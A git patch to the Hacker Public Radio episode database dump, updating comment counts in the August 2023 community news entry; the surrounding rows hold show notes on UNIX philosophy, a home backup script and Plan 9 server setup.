From 025402a2518a168ae0c2a8f53953d74b9ba5b94c Mon Sep 17 00:00:00 2001 From: Ken Fallon Date: Sat, 2 Sep 2023 13:47:26 +0200 Subject: [PATCH] 2023-09-02_11-47-26Z_Saturday database changed --- sql/hpr.sql | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/sql/hpr.sql b/sql/hpr.sql index bcfd7d2..2c8b308 100644 --- a/sql/hpr.sql +++ b/sql/hpr.sql @@ -19977,7 +19977,7 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3665,'2022-08-19','UNIX Is Sublime',3586,'I talk about all of the reasons I love UNIX','

UNIX is sublime

\n
Or, \"how to use a computer without hating yourself for it in the morning\"
\n
Or, \"Unix is basically a simple operating system . . .\"
\n
Or, \"My weariness and disdain for computers grow with each additional unit of knowledge\"
\n
Or, \"Worse is better\"
\n

Origins

\n

UNIX is not Multics

\n

Multics = Multiplexed Information and Computer Service

\n

UNIX = Uniplexed Information and Computing Service

\n

The name \'UNIX\' is a pun on the name \'Multics\'. Multics was entirely too large and complicated to be useful so the boys at Bell Labs cooked up something smaller, less complicated, and easier to use.

\n
\n

Ancient emulation interlude

\n

How to run Multics in 2022.

\n

This wiki helped me emulate UNIXv5.

\n

And this one helped me emulate UNIXv7.

\n

These guys host ancient systems accessible via guest accounts over ssh.

\n
\n

\"Cool, but useless.\"

\n
\n
\n

I know almost nothing about Multics and I\'m not sure if it\'s even worth learning. This is about UNIX, not Multics. Maybe I\'ll come back to it.

\n

Philosophy, implementations, ducks

\n

When I think of \"UNIX\", I do not think of the trademark. Instead, I think of the Unix philosophy. and the general design principles, interface, and behavior of a UNIX system.

\n

A better way of thinking about \"UNIX\" is as something \"POSIX-like\" rather than \"AT&T\'s commercial UNIX\". Example: although Linux and GNU are overly complicated, they pass the duck test for being a UNIX. Pedigree or not, you know a nix when you see one.

\n

Also, when I say \"UNIX\", I mean \"Free UNIX\". I have no interest in proprietary implementations that only exist for the purpose of restricting users and disempowering/discouraging sysadmins from becoming self-reliant.

\n

So what is the philosophy?

\n\n

And additionally:

\n\n

Design

\n

10,000 Ft View

\n

UNIX is a multiuser time sharing networked operating system, running as an always online service. A UNIX system is a single mainframe computer running an operating system designed for multiple users to access concurrently over the network, equally (depending on implementation) sharing resources amongst the active users.

\n

In a traditional network setup, there is one mainframe UNIX machine with multiple dumb terminals connected to it over the network. None of the users touch the mainframe physically. Instead, they interact with it exclusively through their own dumb terms. These dumb terminals have minimal or no computing power of their own because all of the actual computation takes place on the mainframe. Built in networking is a given.

\n

As for the actual software running on the mainframe, it\'s quite simple to visualize. A Unix system is a flexible but organized stack of concepts, each depending on the concept below, all working together for the sole purpose of enabling the end user to play video games and watch videos online.

\n
       / user applications \\\n      /       shells        \\\n     /        daemons        \\\n    /       file systems      \\\n   /        kmods/drivers      \\\n  /           syscalls          \\\n /             kernel            \\\n/             hardware            \\\n
\n

In order to fully explain why UNIX is sublime, I will start from the bottom and work my way upward. Before I discuss the shell, I will explain the multiuser aspects of the system. Then, after a long arduous journey of verbosity, explain how to actually use the thing.

\n

Kernel

\n

The kernel is something the user rarely interacts with. It abstracts all the hard parts away from the user. No more poking random memory addresses to load a program from tape.

\n

Multitasking

\n

In order to support multiple users, resource sharing was implemented. When a user\'s process requests CPU time, it\'s put into a rotational queue along with the other requests for CPU time. Round robin style concurrency is one of the easiest to implement but most modern systems use a weighted model that prioritizes processes owned by specific users. Memory and disk space are typically assigned hard limits to prevent system crashes. \"Ask your sysadmin if you need more resources.\"

\n

Virtual Memory

\n

Abstracting memory management from users is almost necessary in a multitasking system. The kernel must be the arbiter of all. The most interesting thing about virtual memory is that it doesn\'t actually need to be a RAM stick, but can be a swap partition on a disk or even a remote cloud provider if you\'ve actually lost your mind. This type of flexibility improves system stability. Instead of a kernel panic when memory runs out, the kernel can de-prioritize nonessential or idle processes by sending them to swap space.

\n

Paged Memory (logical memory)

\n

No more fragmented memories! The kernel maintains a page table that maps logical locations to physical locations. Instead one continuous chunk of memory, the kernel divides memory into small sections called \"pages\". When allocating memory, the kernel might not give a process continuous pages. The advantage of a paged memory scheme further enables multiuser computing. Example: When you have a large program like a web browser open, the pages that contains the unfocused tabs can be swapped out to disk without stalling the entire browser.

\n

Programming Interface pt. 0 (syscalls, kmods, drivers)

\n

When a process requests a resource, it sends a syscall to the kernel. The kernel then responds to the system call. This allows for privilege separation. Does your web browser need direct access to all memory? What about all files? Do we even want to write assembly every time we want to access a file? Syscalls are dual purpose: abstraction and security.

\n

Kernel modules are dynamic \"extensions\" that give the kernel new features (typically hardware support). The ability to dynamically load/unload modules as hardware changes increases uptime because it means a new kernel doesn\'t need to be compiled, installed, and booted into every time we plug in a different peripheral.

\n

Filesystem

\n

Hierarchical structure

\n

A UNIX filesystem is hierarchical. Each directory contains files or other directories, each with a specific purpose. This type of organization makes it very easy to navigate and manage a system. Each child directory inherits ownership and permissions unless otherwise specified (see Access Control).

\n

In order to visualize this, I imagine a tree-like structure descending from the root directory, /. The tree(1) program shows this type of hierarchy.

\n

Virtual Filesystems (logical filesystem)

\n

The idea behind virtual filesystems is, again, abstraction. Using the concept of a virtual file system, multiple disks can be presented to the user and programmer as a single unified filesystem. This means mounted local disks, NFS shares, and even the contents of a CDROM are presented as if the files contained therein are \"just on the big hard drive\".

\n

Additionally, using bind mounts, a directory can be mounted onto another directory as if it were just another filesystem.

\n

The final interesting thing about virtual filesystems is the concept of a ramdisk: mounting a section of memory so that it can be used as if it was an ordinary directory. <--Shoot foot here.

\n

Everything is a file

\n

Well, almost everything is presented as if it were a file. This greatly simplifies programming.

\n

Prime example: /dev/urandom is a random entropy generator presented as a file, making it very simple for a programmer to implement seeded RNG in a program.

\n

Another example: The kernel translates mouse input into a data stream that can be opened as a file. The programmer only needs to read from /dev/mouse0 instead of writing hundreds of mouse drivers for a clicky GUI.

\n

Exercise 1: Try running this command then wiggling your mouse:

\n
# Linux\n$ sudo cat /dev/input/mouse0\n\n# FreeBSD\n$ sudo cat /dev/sysmouse\n
\n

Yet another example: the TTY is just a file. You can even print it to a text file using setterm(1) on Linux.

\n

Exercise 2:

\n
[user@fedora ~]$ sudo setterm --dump 3\n[user@fedora ~]$ cat screen.dump\n\nFedora Linux 36 (Workstation Edition)\nKernel 5.18.5-200.fc36.x86_64 on an x86_64 (tty3)\n\nfedora login: root\nPassword:\nLast login: Sat Jul 30 14:34:20 on tty3\n[root@fedora ~]# /opt/pfetch/pfetch\n        ,'''''.   root@fedora\n       |   ,.  |  os     Fedora Linux 36 (Workstation Edition)\n       |  |  '_'  host   XXXXXXXXXX ThinkPad T490\n  ,....|  |..     kernel 5.18.5-200.fc36.x86_64\n.'  ,_;|   ..'    uptime 20d 22h 40m\n|  |   |  |       pkgs   3910\n|  ',_,'  |       memory 6522M / 15521M\n '.     ,'\n   '''''\n\n[root@fedora ~]#\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n[user@fedora ~]$\n
\n

Links

\n

Yet another way of \"mounting\" a file or directory to another file or directory is linking. There are two types of links: hard links and symbolic links.

\n

On UNIX, files are indexed by inodes (index nodes). Using links, we can make \"shortcuts\" to files.

\n

Hard linking adds a \"new index\" to a file. They share an inode. If the original file is removed, the file persists in storage because the secondary file created by a hard link still exists. Think \"different name, same file\"

\n

Symlinks are like pointers. A symlink points to the original file instead of the inode. If you remove the original file, the symlink breaks because it points to a file that points to an inode rather than simply pointing to an inode.

\n

Using links, we can make files more convenient to access as if we are \"copying\" files without actually copying files.

\n

Filename extensions

\n

On a UNIX system, file extensions are arbitrary. UNIX determines file type by reading the file headers. The file tells you exactly what type of file it is (just read it). The entire system does not break when a file extension doesn\'t match the expected contents of the file.

\n

Extensions only matter when you wilfully associate with the microsoft users leaving issues on your software repos. \"Not my OS, not my issue, it\'s open source so fork it if you don\'t like it\"

\n

Multiuser (timesharing)

\n

See also: Multitasking.

\n

Exercise 3: attempt to use Windows like a multiuser operating system and get back to me when you have realized that any and all claims made by microsoft about how their \"multi user enterprise system\" is in any way capable of competing with a genuine multi-user UNIX system are false advertising.

\n

Users, Groups

\n

A multiuser system needs a way to manage users and categorize them for access control purposes. Every user has a single user account and belongs to 0 or more groups. Sorting users into groups at the time of account creation makes is significantly easier than granting/revoking permissions user-by-user. Additionally, using something like rctl(8) on FreeBSD allows a systems administrator to allocate resources to specific users, groups, or login classes (like groups).

\n

Daemons (services)

\n

On a UNIX system, every process is owned by a user. In the case of a service, the process is owned by a daemon account. Daemon accounts have limited permissions and make it possible to run persistent services as a non-root user.

\n

Access Control

\n

Since UNIX was designed to be a multiuser system, access control is required. We know about users, we know about groups, but what about permissions?

\n

There are three types of operations that can be done to a file: read, write, and execute. Who can the admin grant these permissions to? The Owner, the Group, and the Other (all). This type of access control is called discretionary access control because the owner of the file can modify files at their own discretion.

\n

Actually using the thing

\n

Programming interface Pt. 1 (data streams)

\n

All UNIX utilities worth using use 3 data streams:

\n\n

Shell

\n

The shell is how a user actually interacts with a UNIX system. It\'s a familiar interface that allows a human user to interact with a computer using real human language.

\n

Explicitly telling the computer to do is infinitely less agonizing than dealing with a computer that tries to do what it thinks you want it to do by interpreting input from a poorly designed, overly engineered interface.

\n

The shell, in addition to being an interactive interface, is also scriptable. Although math is a struggle, shell scripting is a fairly simple way of automating tasks. Taping together interoperable commands you already know makes everything easier. My favorite aspect about writing POSIX shell scripts is knowing that shell is a strongly, statically typed language where the only datatype is string.

\n

Problem that are difficult or messy to solve in shell usually mean it\'s time to write another small C program for your specific needs. Adding the new program into the shell pipeline is trivial.

\n

Pipes

\n

Pipes, the concept that makes UNIX so scriptable. A shell utility that follows the UNIX philosophy will have a non-captive interface, write uncluttered data to stdout, read from stdin, and error to stderr. The | pipe character instructs programs to send their stdout to the next stdin in the pipeline instead of printing to the terminal.

\n

All standard command line utilities are interoperable and can be easily attached like building blocks. \"Meta programming\" has never been easier.

\n

Pipes make it so that every UNIX program is essentially a filter. Sure, you could just use awk, but I prefer shell.

\n

Bonus:

\n\n

Summary:

\n

UNIX is a non-simple modular operating system designed for 1970s big iron mainframes but we love it too much to let it go. Compared to minimal hobbyist operating systems, UNIX is BIG. Compared to commercial operating systems, free UNIX is small. Maybe slightly more than minimum viable but the papercuts are mild enough to forgive.

\n

See Also:

\n

The UNIX-HATERS Handbook

\n',406,0,1,'CC-BY-SA','UNIX',0,0,1), (3657,'2022-08-09','Small time sysadmin',1568,'How I maintain my Linux Box, Part One.','
    \n
  1. Creating Backups.
  2. \n
\n\n
#!/bin/bash\n#License: GPL v3\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <https://www.gnu.org/licenses/>.\n\n#Name: getoverhere.sh\n#Purpose:\n#Version: beta 0.07\n#Author: SGOTI (Some Guy On The Internet)\n#Date: Sat 29 Jan 2022 02:19:29 AM EST\n\n#variables:\nVAR_TBALL=\nVAR_TARGET=\nVAR_JUMP=\nVAR_VALUE=\n\n#start:\ncat << "EOT01"\nOptions:\n    email |"${HOME}/.thunderbird/"\n    jop |"${HOME}/Documents/joplin"\n    dots |"${HOME}/.bashrc .vimrc .bash_aliases"\nEOT01\n\necho -e "What do you want to backup? : \\c."\nread VAR_VALUE\n\ncase ${VAR_VALUE} in\n    "email" )\nVAR_TBALL="INSERT_EMAIL_NAME$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="msgFilterRules.dat"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/ImapMail/imap.mail.yahoo.com/"\n    echo -e "Grabbing INSERT_EMAIL_NAME...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n\nVAR_TBALL="INSERT_EMAIL_NAME$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="msgFilterRules.dat"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/ImapMail/imap.gmail.com/"\n    echo -e "Grabbing INSERT_EMAIL_NAME...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n\nVAR_TBALL="EMAIL_ARCHIVES$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="Mail/"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/"\n    echo -e "Grabbing email EMAIL_ARCHIVES...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > EMAIL_ARCHIVES$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_CALENDER$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="calenders/"\nVAR_JUMP="${HOME}/Documents/"\n    echo -e "Grabbing email THUNDERBIRD_CALENDER...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_CALENDER$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_ADDRESS_BOOK$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="address-book/"\nVAR_JUMP="${HOME}/Documents/"\n    echo -e "Grabbing ${VAR_TARGET}...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_ADDRESS_BOOK$(date +%m-%d-%Y).txt\n    sleep 1\n\nVAR_TBALL="THUNDERBIRD_ALL$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET=".thunderbird/"\nVAR_JUMP="${HOME}/"\n    echo -e "Grabbing ${VAR_TARGET}...\\n"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > THUNDERBIRD_ALL$(date +%m-%d-%Y).txt ;;\n\n    "jop" )\nVAR_TBALL="JOPLIN$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET="joplin/"\nVAR_JUMP="${HOME}/Documents/"\n    echo "Grabbing ${VAR_TARGET}"\ntar -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET}\n    sleep 1\n    echo -e "Creating List for ${VAR_TBALL}...\\n"\nls -lhAR --group-directories-first ${VAR_JUMP}${VAR_TARGET} > JOPLIN$(date +%m-%d-%Y).txt ;;\n\n    "dots" )\nVAR_TBALL="dots$(date +%m-%d-%Y).tar.gz"\nVAR_TARGET=".bashrc .vimrc .bash_aliases"\nVAR_JUMP="${HOME}/"\n    echo "Grabbing ${VAR_TARGET}"\ntar -v -C ${VAR_JUMP} --create --file ${VAR_TBALL} --gzip ${VAR_TARGET} ;;\n\n    * )\n    echo "Good Heavens..." ;;\nesac\nexit;\n
\n
\n
    \n
  1. Restoring from backups.
  2. \n
\n\n
VAR_TBALL="EMAIL_ARCHIVES*.tar.gz"\nVAR_JUMP="${HOME}/.thunderbird/*.default-release/"\n    echo -e "Restoring EMAIL_ARCHIVES...\\n"\ntar --extract --directory= ${VAR_JUMP} --file ${VAR_TBALL}\n    echo -e "EMAIL_ARCHIVES restored.\\n"\n
\n',391,0,0,'CC-BY-SA','sysadmin, system maintenance, tar, backups',0,0,1), (3664,'2022-08-18','Secret hat conversations',1070,'You\'ll need your tin hat for this one.','

The Tin Foil Hat often worn in the belief or hope that it shields the brain from threats such as electromagnetic fields, mind control, and mind reading.

\n
    \n
  1. Proper hat construction video. Also includes the “why” along with the “how”.
  2. \n
  3. Proper hat construction music. Just something to keep you focused.
  4. \n
\n
\n

FCC Caller ID Spoofing info: Spoofing is when a caller deliberately falsifies the information transmitted to your caller ID display to disguise their identity.

\n

FCC Call Blocking info: Call blocking is a tool used by phone companies to stop illegal and unwanted calls from reaching your phone. A second annual FCC report released in June 2021 found that many voice service providers and third-party analytics companies are improving their call blocking and labeling services and use new data to better detect robocalls. Billions of unwanted calls to American consumers are being blocked each year.

\n

The PinePhone Pro Explorer Edition is aimed at Linux developers with an extensive knowledge of embedded systems and/or experience with mobile Linux.

\n

Time-based one-time password (TOTP) is a computer algorithm that generates a one-time password (OTP) that uses the current time as a source of uniqueness. As an extension of the HMAC-based one-time password algorithm (HOTP), it has been adopted as Internet Engineering Task Force (IETF) standard RFC 6238.

\n

Matrix is an open standard for interoperable, decentralised, real-time communication over IP.

\n
\n

Password Managers: Used by Some Guy On The Internet.
\nBitwarden
\nKeePassXC

\n
\n',391,0,1,'CC-BY-SA','Tin hat, call spoofing',0,0,1), -(3936,'2023-09-04','HPR Community News for August 2023',0,'HPR Volunteers talk about shows released and comments posted in August 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Fred Black.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3912Tue2023-08-01Emergency Show: Biltong and RooibosShane Shennan
3913Wed2023-08-02Lurking Prion Q and ALurking Prion
3914Thu2023-08-03how to deal with blistersdnt
3915Fri2023-08-04Why the hell is my audio clipping?MrX
3916Mon2023-08-07HPR Community News for July 2023HPR Volunteers
3917Tue2023-08-08Response to \"Permission Tickets\" by oneofspoonsdnt
3918Wed2023-08-09Emacs package curation, part 3dnt
3919Thu2023-08-10How I hacked my voicetuturto
3920Fri2023-08-11RV Trip 2022-2023: Southeast USAhuka
3921Mon2023-08-14HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)HPR_AudioBookClub
3922Tue2023-08-15Silent KeyTrey
3923Wed2023-08-16Meal preparation.Some Guy On The Internet
3924Thu2023-08-17Mass Quick Tips for August 2023operat0r
3925Fri2023-08-18Uncommon tools and social mediaDaniel Persson
3926Mon2023-08-21Karate Do: An OverviewHipernike
3927Tue2023-08-22Audacity Update 20230702Ahuka
3928Wed2023-08-23RE: Klaatu.Some Guy On The Internet
3929Thu2023-08-24Some experiences with different notes appsLee
3930Fri2023-08-25Playing Civilization II Test of TimeAhuka
3931Mon2023-08-28What Instrument was played in hpr3905?Fred Black
3932Tue2023-08-29Short introduction to inxifolky
3933Wed2023-08-30Planning for a planner.Some Guy On The Internet
3934Thu2023-08-31Crusader Kings IItuturto
\n\n

Comments this month

\n\n

Note to Volunteers: Comments marked in green were read in the last\nCommunity News show and should be ignored in this one.

These are comments which have been made during the past month, either to shows released during the month or to past shows.\nThere are 20 comments in total.

\n

Past shows

\n

There are 5 comments on\n5 previous shows:

\n

Updated on 2023-08-31 10:33:59

\n

This month\'s shows

\n

There are 15 comments on 8 of this month\'s shows:

\n\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-August/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), +(3936,'2023-09-04','HPR Community News for August 2023',0,'HPR Volunteers talk about shows released and comments posted in August 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Fred Black.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3912Tue2023-08-01Emergency Show: Biltong and RooibosShane Shennan
3913Wed2023-08-02Lurking Prion Q and ALurking Prion
3914Thu2023-08-03how to deal with blistersdnt
3915Fri2023-08-04Why the hell is my audio clipping?MrX
3916Mon2023-08-07HPR Community News for July 2023HPR Volunteers
3917Tue2023-08-08Response to \"Permission Tickets\" by oneofspoonsdnt
3918Wed2023-08-09Emacs package curation, part 3dnt
3919Thu2023-08-10How I hacked my voicetuturto
3920Fri2023-08-11RV Trip 2022-2023: Southeast USAhuka
3921Mon2023-08-14HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)HPR_AudioBookClub
3922Tue2023-08-15Silent KeyTrey
3923Wed2023-08-16Meal preparation.Some Guy On The Internet
3924Thu2023-08-17Mass Quick Tips for August 2023operat0r
3925Fri2023-08-18Uncommon tools and social mediaDaniel Persson
3926Mon2023-08-21Karate Do: An OverviewHipernike
3927Tue2023-08-22Audacity Update 20230702Ahuka
3928Wed2023-08-23RE: Klaatu.Some Guy On The Internet
3929Thu2023-08-24Some experiences with different notes appsLee
3930Fri2023-08-25Playing Civilization II Test of TimeAhuka
3931Mon2023-08-28What Instrument was played in hpr3905?Fred Black
3932Tue2023-08-29Short introduction to inxifolky
3933Wed2023-08-30Planning for a planner.Some Guy On The Internet
3934Thu2023-08-31Crusader Kings IItuturto
\n\n

Comments this month

\n\n

Note to Volunteers: Comments marked in green were read in the last\nCommunity News show and should be ignored in this one.

These are comments which have been made during the past month, either to shows released during the month or to past shows.\nThere are 21 comments in total.

\n

Past shows

\n

There are 5 comments on\n5 previous shows:

\n

Updated on 2023-09-01 15:05:10

\n

This month\'s shows

\n

There are 16 comments on 8 of this month\'s shows:

\n\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-August/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n

Site Migration

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), (3666,'2022-08-22','One Weird Trick',997,'I talk about getting into or advancing in cybersecurity & how keyboards could trick malware.','

In this episode, I talk about getting in to the field of cybersecurity or moving up in the field. I also talk about how keyboards could keep malware from going Boom on your system.

\n

Links:

\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,malware, career',0,0,1), (3669,'2022-08-25','My First Podcast: My Journey into the Computer World',1207,'How I was introduced into computers, Linux, robotics, programming, cibersecurity and more...','

Milestones in my Journey

\n
    \n
  1. Studied Windows office and played online games
  2. \n
  3. Electronics
  4. \n
  5. Programming with Scratch
  6. \n
  7. Studied Javascript with Khan Academy
  8. \n
  9. Used Processing
  10. \n
  11. Learned Arduino and robotics
  12. \n
  13. Programmed with Visual Studio Code
  14. \n
  15. Learned Git
  16. \n
  17. Learned Windows Batch, VBS, registry, and others
  18. \n
  19. Introduction to Linux and disks with Tails
  20. \n
  21. Installation of Linux mint
  22. \n
  23. Installation of Debian
  24. \n
  25. Learned Apt, sudo, and other commands
  26. \n
  27. Discovered the Raspberry Pi
  28. \n
  29. Learned ssh, vnc, servers and networking with the Raspberry Pi
  30. \n
  31. Received a Thinkpad laptop and installed on it Bodhi Linux, Linux Lite and Alpine Linux
  32. \n
  33. Learned about erasure, recovery and encryption of data
  34. \n
  35. Learned more about Linux (Screen, network configuration, emacs, programming in C)
  36. \n
  37. Discovered Nethack and Open Adventure console games
  38. \n
  39. Studied hacking and pentesting
  40. \n
  41. Helped a company with its computers and learned from it guys
  42. \n
  43. Introduction to Python and BSD
  44. \n
\n',410,29,0,'CC-BY-SA','linux, programming, cibersecurity, robotics, hardware',0,0,1), (3678,'2022-09-07','\"Stupid Users\" ... no, not those users, the other \"stupid users\"',907,'Brady & I discuss stupid things done by those of us who really should know better.','

In this week\'s episode, I chat with R. Brady Frost about the little plumber vs the gigantic rock. Then we move in to a discussion about the fallacy of stupid users with some great stories of stupid things done by those of us who really should know better. The moral of the story, is that we are all human and nothing will ever change that. Instead, we need to be prepared for when humans are human.

\n

Links:

\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,users,stupid human tricks,customer service',0,0,1), @@ -19996,7 +19996,7 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3684,'2022-09-15','Wake on Lan',602,'Wake on Lan mother board feature','

WakeOnLAN (WOL)

\n

From wiki.wireshark.org

\n
\n

WakeOnLAN is the protocol name given to the so-called Magic Packet technology, developed by AMD and Hewlett Packard for remotely waking up a remote host that may have been automatically powered-down because of its power management features. Although power management allows companies and individuals to cut power usage costs, it presents a problem for IT departments especially in being able to quickly and efficiently remotely manage PC\'s, especially during off-hours operation when those PC\'s are most likely to be in a suspended or standby state, assuming power management features are enabled.

\n
\n',129,0,0,'CC-BY-SA','Wake on Lan, wol',0,0,1), (3686,'2022-09-19',' Followup for HPR3675: Clarifications on the path traversal bug',2335,'installing a plan 9 cpu+web server, namespaces to the rescue, web app security models and more','

Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models

\n
\n

Installing Plan 9 with libvirt

\n
[root@localhost]# virt-install -n 9pwn \\\n--description "pre-patched rc-httpd" \\\n--osinfo=unknown \\\n--memory=4096 \\\n--vcpus=4 \\\n--disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 \\\n--graphics spice \\\n--cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso \\\n--network bridge=virbr0\n\n[root@localhost]# virt-viewer 9pwn\n
\n

How I find the IP of my guests and add it to my /etc/hosts for faster access.

\n
[root@localhost]# virsh domiflist 9pwn\n Interface   Type     Source   Model   MAC\n----------------------------------------------------------\n vnet3       bridge   virbr0   e1000   52:54:00:43:8a:50\n\n[root@localhost]# arp -e | grep 52:54:00:43:8a:50\n192.168.122.20           ether   52:54:00:43:8a:50   C                     virbr0\n\n[root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts\n
\n

Proceed as normal with a 9 installation

\n
\n

Set up CPU server with rc-httpd and werc

\n

I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it\'s fine) I\'ve snarfed+pasted it here for the sake of completeness and modified it slightly so that it\'s more accessible for other people. I\'ve also revised these notes so that they\'re less-broken. I may or may not update them.

\n

I\'m using 9front for this. It has more secure authentication protocols when it comes to remotely connecting.

\n

Configuring a CPU server

\n

Add users to file server

\n

Connect to the file server and add a new user called <ExampleUser> who is in the groups sys, adm, and upas

\n
term% con -C /srv/cwfs.cmd\nnewuser <ExampleUser>\nnewuser sys +<ExampleUser>\nnewuser adm +<ExampleUser>\nnewuser upas +<ExampleUser>\n
\n

Reboot and set user=<ExampleUser> when prompted at boot time.

\n

Configure user\'s environment

\n

This is similar to cp -r /etc/skel /home/<ExampleUser> on a UNIX system.

\n
/sys/lib/newuser\n
\n

Configure headless booting

\n

Mount the boot partition:

\n
term% 9fs 9fat\n
\n

edit the boot config, /n/9fat/plan9.ini

\n
bootfile=9pc64\nnobootprompt=local!/dev/sdC0/fscache\nmouseport=ps2\nmonitor=vesa\nvgasize=1024x768x14\nuser=<ExampleUser>\ntiltscreen=none\nservice=cpu\n
\n

Add hostowner info to nvram

\n

Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner.

\n

For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner\'s key to nvram.

\n
term% nvram=/dev/sdF0/nvram auth/wrkey\nbad nvram des key\nbad authentication id\nbad authentication domain\nauthid: <ExampleUser>\nauthdom: cirno\nsecstore key: <press the return key if you do not want to type this at boot time>\npassword: <make it 8 chars>\n
\n

Configure auth server

\n

In order to connect to the system over the network, the new user must be added to the auth server.

\n
